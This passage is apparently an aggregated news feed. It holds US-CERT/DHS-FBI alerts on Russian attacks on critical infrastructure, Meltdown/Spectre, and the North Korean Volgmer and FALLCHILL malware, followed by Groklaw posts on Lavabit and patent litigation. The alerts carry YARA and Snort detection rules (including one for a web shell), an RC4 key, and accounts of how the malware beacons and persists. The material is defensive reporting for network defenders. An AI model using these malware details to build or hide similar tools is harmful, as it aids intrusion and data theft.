condition: $zip_magic at 0 and $dir1 and $bytes} rule Query_Javascript_Decode_Function{meta: name= "Query_Javascript_Decode_Function" author = "other" strings: $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B} $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29} $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29} $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29} $func_call="a(\"" condition: filesize < 20KB and #func_call > 20 and all of ($decode*) } rule Query_XML_Code_MAL_DOC{meta: name= "Query_XML_Code_MAL_DOC" author = "other" strings: $zip_magic = { 50 4b 03 04 } $dir = "word/_rels/" ascii $dir2 = "word/theme/theme1.xml" ascii $style = "word/styles.xml" ascii condition: $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd} rule z_webshell{meta: description = "Detection for the z_webshell" author = "DHS NCCIC Hunt and Incident Response Team" date = "2018/01/25" md5 = "2C9095C965A55EFC46E16B86F9B7D6C6" strings: $aspx_identifier1 = "<%@ " nocase ascii wide $aspx_identifier2 = "<asp:" nocase ascii wide $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide $webshell_name = "public string z_progname =" nocase ascii wide $webshell_password = "public string Password =" nocase ascii wide condition: 1 of ($aspx_identifier*) and #script_import > 10 and #case_string > 7 and 2 of ($webshell_*) and filesize < 100KB}
Impact
This actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors.
Solution
DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity. Network and Host-based SignaturesDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity. Detections and Prevention MeasuresUsers and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:network intrusion detection system/network intrusion protection system logs,web content logs,proxy server logs,domain name server resolution logs,packet capture (PCAP) repositories,firewall logs,workstation Internet browsing history logs,host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,data loss prevention logs,exchange server logs,user mailboxes,mail filter logs,mail content logs,AV mail logs,OWA logs,Blackberry Enterprise Server logs, andMobile Device Management logs.To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:application logs,IIS/Apache logs,file system,intrusion detection system/ intrusion prevention system logs,PCAP repositories,firewall logs, andreverse proxy.Detect spear-phishing by searching workstation file systems and network-based user directories, for attachment filenames and hashes found in the IOC packages.Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal”. Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.Detect installation by searching all proxy logs for downloads from URIs without domain names. General Best Practices Applicable to this Campaign:Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.Segment any critical networks or control systems from business systems and networks according to industry best practices.Ensure adequate logging and visibility on ingress and egress points.Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.Store system logs of mission critical systems for at least one year within a security information event management tool.Ensure applications are configured to log the proper level of detail for an incident response investigation.Consider implementing HIPS or other controls to prevent unauthorized code execution.Establish least-privilege controls.Reduce the number of Active Directory domain and enterprise administrator accounts.Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.Establish a password policy to require complex passwords for all users.Ensure that accounts for network administration do not have external connectivity.Ensure that network administrators use non-privileged accounts for email and Internet access.Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).Implement a process for logging and auditing activities conducted by privileged accounts.Enable logging and alerting on privilege escalations and role changes.Periodically conduct searches of publically available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.Assign sufficient personnel to review logs, including records of alerts.Complete independent security (as opposed to compliance) risk review.Create and participate in information sharing programs.Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan. Report NoticeDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).
References
[1] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017.
[2] CERT CC. Vulnerability Note #672268
[3] CCIRC CF17-010 UPDATE
[4] MIFR-10127623
Revision History
March 15, 2018: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
vollständige Meldung - 01/04/18 TA18-004A: Meltdown and Spectre Side-Channel Vulnerability Guidance
Original release date: January 04, 2018 | Last revised: February 10, 2018
Systems Affected
CPU hardware implementations
Overview
On January 3, 2018, the National Cybersecurity and Communications Integration Center (NCCIC) became aware of a set of security vulnerabilities—known as Meltdown and Spectre—that affect modern computer processors. These vulnerabilities can be exploited to steal sensitive data present in a computer systems' memory.
Description
CPU hardware implementations are vulnerable to side-channel attacks, referred to as Meltdown and Spectre. Meltdown is a bug that "melts" the security boundaries normally enforced by the hardware, affecting desktops, laptops, and cloud computers. Spectre is a flaw an attacker can exploit to force a program to reveal its data. The name derives from "speculative execution"—an optimization method a computer system performs to check whether it will work to prevent a delay when actually executed. Spectre affects almost all devices including desktops, laptops, cloud servers, and smartphones.More details of these attacks can be found here:Common Vulnerability and Exposure (CVE):Rogue Data Cache Load: CVE-2017-5754 (Meltdown) https://nvd.nist.gov/vuln/detail/CVE-2017-5754Bounds Check Bypass: CVE-2017-5753 (Spectre) https://nvd.nist.gov/vuln/detail/CVE-2017-5753Branch Target Injection: CVE-2017-5715 (Spectre) https://nvd.nist.gov/vuln/detail/CVE-2017-5715CERT/CC’s Vulnerability Note VU#584653
Impact
An attacker can gain access to the system by establishing command and control presence on a machine via malicious Javascript, malvertising, or phishing. Once successful, the attacker could escalate privileges to exploit Meltdown and Spectre vulnerabilities, revealing sensitive information from a computer’s kernel memory, including keystrokes, passwords, encryption keys, and other valuable information.
Solution
MitigationNCCIC encourages users and administrators to refer to their hardware and software vendors for the most recent information. In the case of Spectre, the vulnerability exists in CPU architecture rather than in software, and is not easily patched; however, this vulnerability is more difficult to exploit. After patching, performance impacts may vary, depending on use cases. NCCIC recommends administrators ensure that performance is monitored for critical applications and services, and work with their vendor(s) and service provider(s) to mitigate the effect, if possible.Additionally, NCCIC recommends users and administrators who rely on cloud infrastructure work with their CSP to mitigate and resolve any impacts resulting from host OS patching and mandatory rebooting.For machines running Windows Server, a number of registry changes must be completed in addition to installation of the patches. NCCIC recommends verifying your Windows Server version before downloading applicable patches and performing registry edits. A list of registry changes can be found here: https://support.microsoft.com/en-us/help/4072698/windows-server-guidance-to-protect-against-the-speculative-executionAntivirusTypical antivirus programs are built on a signature management system, and may not be able to detect the vulnerabilities. NCCIC recommends checking with your antivirus vendor to confirm compatibility with Meltdown and Spectre patches. Microsoft recommends third-party antivirus vendors add a change to the registry key of the machine running the antivirus software. Without it, that machine will not receive any of the following fixes from Microsoft:Windows UpdateWindows Server Update ServicesSystem Center Configuration Manager More information can be found here: https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software.Vendor LinksThe following table contains links to advisories and patches published in response to the vulnerabilities. This table will be updated as information becomes available.Note: NCCIC strongly recommends:downloading any patches or microcode directly from your vendor's websiteusing a test environment to verify each patch before implmentingLink to Vendor InformationDate AddedAmazonJanuary 4, 2018AMDJanuary 4, 2018AndroidJanuary 4, 2018AppleJanuary 4, 2018ARMJanuary 4, 2018CentOSJanuary 4, 2018ChromiumJanuary 4, 2018CiscoJanuary 10, 2018CitrixJanuary 4, 2018DebianJanuary 5, 2018DragonflyBSDJanuary 8, 2018F5January 4, 2018Fedora ProjectJanuary 5, 2018FortinetJanuary 5, 2018HPJanuary 19, 2018GoogleJanuary 4, 2018HuaweiJanuary 4, 2018IBMJanuary 5, 2018IntelJanuary 4, 2018JuniperJanuary 8, 2018LenovoJanuary 4, 2018LinuxJanuary 4, 2018LLVM: variant #2January 8, 2018LLVM: builtin_load_no_speculateJanuary 8, 2018LLVM: llvm.nospeculatedloadJanuary 8, 2018Microsoft AzureJanuary 4, 2018MicrosoftJanuary 4, 2018MozillaJanuary 4, 2018NetAppJanuary 8, 2018NutanixJanuary 10, 2018NVIDIAJanuary 4, 2018OpenSuSEJanuary 4, 2018OracleJanuary 17, 2018QubesJanuary 8, 2018Red HatJanuary 4, 2018SuSEJanuary 4, 2018SynologyJanuary 8, 2018Trend MicroJanuary 4, 2018UbuntuJanuary 17, 2018VMwareJanuary 10, 2018XenJanuary 4, 2018
References
Graz University of Technology Meltdown website
Graz University of Technology Spectre website
Rogue Data Cache Load: CVE-2017-5754
Bounds Check Bypass: CVE-2017-5753
Branch Target Injection: CVE-2017-5715
CERT/CC’s Vulnerability Note VU#584653
Revision History
January 4, 2018: Initial version
January 5, 2018: Updated vendor information links for Citrix, Mozilla, and IBM in the table and added links to Debian, Fedora Project, and Fortinet
January 8, 2018: Added links to DragonflyBSD, Juniper, LLVM, NetApp, Qubes, and Synology
January 9, 2018: Updated Solution Section
January 10, 2018: Added links to Cisco and Nutanix
January 17, 2018: Added note to Mitigation section and links to Oracle and Ubuntu
January 18, 2018: Updated Description, Impact, and Solution Sections, and added an additional link
January 19, 2018: Added link to HP
January 31, 2018: Provided additional links and updated Description and Mitigation sections
This product is provided subject to this Notification and this Privacy & Use policy.
vollständige Meldung - 11/14/17 TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
Original release date: November 14, 2017 | Last revised: November 22, 2017
Systems Affected
Network systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a Trojan malware variant used by the North Korean government—commonly known as Volgmer. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity.This alert includes IOCs related to HIDDEN COBRA, IP addresses linked to systems infected with Volgmer malware, malware descriptions, and associated signatures. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the Volgmer malware, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.For a downloadable copy of IOCs, see:IOCs (.csv)IOCs (.stix)NCCIC conducted analysis on five files associated with or identified as Volgmer malware and produced a Malware Analysis Report (MAR). MAR-10135536-D examines the tactics, techniques, and procedures observed. For a downloadable copy of the MAR, see:MAR (.pdf)MAR IOCs (.stix)
Description
Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with VolgmerThe U.S. Government has analyzed Volgmer’s infrastructure and have identified it on systems using both dynamic and static IP addresses. At least 94 static IP addresses were identified, as well as dynamic IP addresses registered across various countries. The greatest concentrations of dynamic IPs addresses are identified below by approximate percentage:India (772 IPs) 25.4 percentIran (373 IPs) 12.3 percentPakistan (343 IPs) 11.3 percentSaudi Arabia (182 IPs) 6 percentTaiwan (169 IPs) 5.6 percentThailand (140 IPs) 4.6 percentSri Lanka (121 IPs) 4 percentChina (82 IPs, including Hong Kong (12)) 2.7 percentVietnam (80 IPs) 2.6 percentIndonesia (68 IPs) 2.2 percentRussia (68 IPs) 2.2 percentTechnical DetailsAs a backdoor Trojan, Volgmer has several capabilities including: gathering system information, updating service registry keys, downloading and uploading files, executing commands, terminating processes, and listing directories. In one of the samples received for analysis, the US-CERT Code Analysis Team observed botnet controller functionality.Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications.Malicious actors commonly maintain persistence on a victim’s system by installing the malware-as-a-service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words.Detection and ResponseThis alert’s IOC files provide HIDDEN COBRA indicators related to Volgmer. DHS and FBI recommend that network administrators review the information provided, identify whether any of the provided IP addresses fall within their organizations’ allocated IP address space, and—if found—take necessary measures to remove the malware.When reviewing network perimeter logs for the IP addresses, organizations may find instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find some traffic relates to malicious activity and some traffic relates to legitimate activity.Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains. These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.Network Signaturesalert tcp any any -> any any (msg:"Malformed_UA"; content:"User-Agent: Mozillar/"; depth:500; sid:99999999;)___________________________________________________________________________________________________YARA Rulesrule volgmer{meta: description = "Malformed User Agent"strings: $s = "Mozillar/"condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $s}
Impact
A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts includetemporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation.
Solution
Mitigation StrategiesDHS recommends that users and administrators use the following best practices as preventive measures to protect their computer networks:Use application whitelisting to help prevent malicious software and unapproved programs from running. Application whitelisting is one of the best security strategies as it allows only specified programs to run, while blocking all others, including malicious software.Keep operating systems and software up-to-date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Patching with the latest updates greatly reduces the number of exploitable entry points available to an attacker.Maintain up-to-date antivirus software, and scan all software downloaded from the Internet before executing.Restrict users’ abilities (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, embedded code will execute the malware on the machine. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams. Follow safe practices when browsing the web. See Good Security Habits and Safeguarding Your Data for additional details.Do not follow unsolicited web links in emails. See Avoiding Social Engineering and Phishing Attacks for more information.Response to Unauthorized Network AccessContact DHS or your local FBI office immediately. To report an intrusion and request resources for incident response or technical assistance, contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).
References
Revision History
November 14, 2017: Initial version
This product is provided subject to this Notification and this Privacy & Use policy.
vollständige Meldung - 11/14/17 TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
Original release date: November 14, 2017 | Last revised: November 22, 2017
Systems Affected
Network systems
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to any North Korean government malicious cyber activity.This alert includes IOCs related to HIDDEN COBRA, IP addresses linked to systems infected with FALLCHILL malware, malware descriptions, and associated signatures. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the FALLCHILL malware, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.For a downloadable copy of IOCs, see:IOCs (.csv)IOCs (.stix)NCCIC conducted analysis on two samples of FALLCHILL malware and produced a Malware Analysis Report (MAR). MAR-10135536-A examines the tactics, techniques, and procedures observed in the malware. For a downloadable copy of the MAR, see:MAR (.pdf)MAR IOCs (.stix)
Description
According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.During analysis of the infrastructure used by FALLCHILL malware, the U.S. Government identified 83 network nodes. Additionally, using publicly available registration information, the U.S. Government identified the countries in which the infected IP addresses are registered.Technical DetailsFALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim’s system. According to trusted third-party reporting, communication flows from the victim’s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1.Figure 1. HIDDEN COBRA Communication FlowFALLCHILL uses fake Transport Layer Security (TLS) communications, encoding the data with RC4 encryption with the following key: [0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82]. FALLCHILL collects basic system information and beacons the following to the C2:operating system (OS) version information,processor information,system name,local IP address information,unique generated ID, andmedia access control (MAC) address.FALLCHILL contains the following built-in functions for remote operations that provide various capabilities on a victim’s system:retrieve information about all installed disks, including the disk type and the amount of free space on the disk;create, start, and terminate a new process and its primary thread;search, read, write, move, and execute files;get and modify file or directory timestamps;change the current directory for a process or file; anddelete malware and artifacts associated with the malware from the infected system.Detection and ResponseThis alert’s IOC files provide HIDDEN COBRA indicators related to FALLCHILL. DHS and FBI recommend that network administrators review the information provided, identify whether any of the provided IP addresses fall within their organizations’ allocated IP address space, and—if found—take necessary measures to remove the malware.When reviewing network perimeter logs for the IP addresses, organizations may find instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find some traffic relates to malicious activity and some traffic relates to legitimate activity.Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains. These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.Network Signaturesalert tcp any any -> any any (msg:"Malicious SSL 01 Detected";content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\x04\x88\x4d\x76/"; rev:1; sid:2;)___________________________________________________________________________________________alert tcp any any -> any any (msg:"Malicious SSL 02 Detected";content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\x06\x88\x4d\x76/"; rev:1; sid:3;)___________________________________________________________________________________________alert tcp any any -> any any (msg:"Malicious SSL 03 Detected";content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\xb2\x63\x70\x7b/"; rev:1; sid:4;)___________________________________________________________________________________________alert tcp any any -> any any (msg:"Malicious SSL 04 Detected";content:"|17 03 01 00 08|"; pcre:"/\x17\x03\x01\x00\x08.{4}\xb0\x63\x70\x7b/"; rev:1; sid:5;)___________________________________________________________________________________________YARA RulesThe following rules were provided to NCCIC by a trusted third party for the purpose of assisting in the identification of malware associated with this alert.THIS DHS/NCCIC MATERIAL IS FURNISHED ON AN “AS-IS” BASIS. These rules have been tested and determined to function effectively in a lab environment, but we have no way of knowing if they may function differently in a production network. Anyone using these rules are encouraged to test them using a data set representitive of their environment.rule rc4_stack_key_fallchill{meta: description = "rc4_stack_key"strings: $stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $stack_key}rule success_fail_codes_fallchill{meta: description = "success_fail_codes"strings: $s0 = { 68 7a 34 12 00 } $s1 = { ba 7a 34 12 00 } $f0 = { 68 5c 34 12 00 } $f1 = { ba 5c 34 12 00 }condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and (($s0 and $f0) or ($s1 and $f1))}___________________________________________________________________________________________
Impact
A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:temporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation.
Solution
Mitigation StrategiesDHS recommends that users and administrators use the following best practices as preventive measures to protect their computer networks:Use application whitelisting to help prevent malicious software and unapproved programs from running. Application whitelisting is one of the best security strategies as it allows only specified programs to run, while blocking all others, including malicious software.Keep operating systems and software up-to-date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Patching with the latest updates greatly reduces the number of exploitable entry points available to an attacker.Maintain up-to-date antivirus software, and scan all software downloaded from the Internet before executing.Restrict users’ abilities (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, embedded code will execute the malware on the machine. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams. Follow safe practices when browsing the web. See Good Security Habits and Safeguarding Your Data for additional details.Do not follow unsolicited web links in emails. See Avoiding Social Engineering and Phishing Attacks for more information.Response to Unauthorized Network AccessContact DHS or your local FBI office immediately. To report an intrusion and request resources for incident response or technical assistance, contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).
References
Revision History
November 14, 2017: Initial version
This product is provided subject to this Notification and this Privacy & Use policy.
vollständige Meldung
bugtraq mailing listHelp Net Security - Vulnerabilitiesheise online NewsHome - THE INQUIRERGroklaw- 08/20/13 Forced Exposure ~pj
The owner of Lavabit tells us that he's stopped using email and if we knew what he knew, we'd stop too. There is no way to do Groklaw without email. Therein lies the conundrum.
What to do?
vollständige Meldung - 08/15/13 Apple v. Samsung I: Case Management Statement, Hearing Aug. 21 ~pj Updated
There will be a hearing in Apple v. Samsung I in Judge Lucy Koh's courtroom, Courtroom 8 on the 4th floor, on August 21 at 2:00 PM, so if any of you stalwarts can attend, that would be fabulous. You don't even have to wake up early.
What's it about? Didn't they just have a case management hearing in April? Why yes. Yes, they did, but there have been "progress and changes" since, according to the parties' Joint Case Management Statement [PDF], which fills us in on the details. Both parties would like some changes since the last case management hearing. Here's the last joint case management statement, back in April. And the judge's order on April 30 was to go forward immediately with the damages trial, unless certain things happened in the USPTO reexaminations of Apple's patents at issue. Some of those things have almost happened, and there are other quirks, so some changes are being requested. The real core issue is
Samsung's '381 motion, asking for a new trial on Apple's '381 patent based on newly discovered evidence or for entry of judgment on liability. Apple Opposes with a capital O. It now wants another chance to file a sur-reply [PDF], which Samsung
opposes [PDF], claiming that "Apple identifies no 'new' arguments Samsung raised in its reply that were not
responsive to arguments in Apple's opposition." The parties have been told that this motion wasn't on the calendar yet, but that they should be prepared to argue it on August 21. There is also the fact that the USPTO has found all relevant claims in the '915 patent invalid in a final office action. There can be more to come on that, but how does it impact the damages trial is the question?
And that is why we really should be there to hear it, if any of you can arrange your affairs to get there and be our eyes and ears. Samsung is telling the court that "Apple is attempting to 'sandbag'
Samsung and obtain an unfair tactical advantage" by various proposals on how to go forward and by refusing to seriously meet and confer with Samsung. For example, Apple wants the judge to restrict the parties to the same exhibits used at the first trial. But that's not really fair in Samsung's eyes, because since that first trial, Apple has said things to the USPTO that conflict with what they said about the '381 and '915 patents at that trial:Samsung does not believe the Court should limit the parties to the same exhibits disclosed prior to the first trial. For example, Apple has made numerous admissions to the USPTO subsequent to the first trial that directly contradict its arguments concerning the scope of the '381 and '915 patents. Apple should not be permitted to tell the
Patent Office one thing and the new jury another. Samsung should be able to put this new evidence before the jury. Doing so would raise no issues concerning inconsistent appellate records because liability issues are not being retried and this damages trial will have its own separate record. Rather, the trial should be held based on an evidentiary record as it exists at the time of the new trial. If you can go, email me please and I'll tell you more. [Update: We still need a volunteer.]
vollständige Meldung - 08/13/13 Judge Robart Rules in MS v. Motorola: Seeking an Injunction on a FRAND Patent Can Be Perfectly Proper ~pj Updated - As text.
Judge James L. Robart has now ruled [PDF, 38 pages] on Microsoft and Motorola's summary judgment motions, granting in part and denying in part.
He
has ruled that seeking an injunction over a FRAND patent can be proper and is not necessarily a breach of the FRAND commitment:Additionally, as explained above, material issues of fact exist regarding whether the October offer letters violated the duty of good faith. In addition to the rate contained in the offer letters, the jury will consider language of the letters, the circumstances surrounding the letters, the industry custom and practice, and Motorola's intent in sending the letters. Motorola has presented evidence that the letters were sent in good faith, and the jury will make the final determination....
